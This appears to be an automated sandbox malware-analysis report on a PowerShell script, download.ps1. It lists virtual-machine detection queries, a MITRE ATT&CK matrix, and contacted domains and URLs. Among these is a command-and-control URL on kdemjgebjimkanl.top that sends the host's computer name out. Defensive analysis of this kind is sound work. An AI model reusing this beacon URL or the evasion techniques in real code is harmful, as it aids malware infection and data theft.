Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6368Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3440Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwarexJ
Source: powershell.exe, 00000000.00000002.1795899984.0000022F42CF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineijbfdRMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1794758890.0000022F42BA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachinexJ
Source: powershell.exe, 00000000.00000002.1797144055.0000022F42D06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=5270%Avira URL Cloudsafe
http://www.google.comv0%Avira URL Cloudsafe
http://kdemjgebjimkanl.top0%Avira URL Cloudsafe
http://kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=5270%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kdemjgebjimkanl.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.185.132
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schema.org/WebPagepowershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C0FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C294000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C2AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2C290000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://0.google.com/powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://kdemjgebjimkanl.toppowershell.exe, 00000000.00000002.1753101388.0000022F2B279000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.google.compowershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26sourcepowershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://apis.google.compowershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1753101388.0000022F2A651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1784267923.0000022F3A651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A94B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1753101388.0000022F2B414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.google.comvpowershell.exe, 00000000.00000002.1753101388.0000022F2B3FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1784267923.0000022F3A6C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://0.googlepowershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
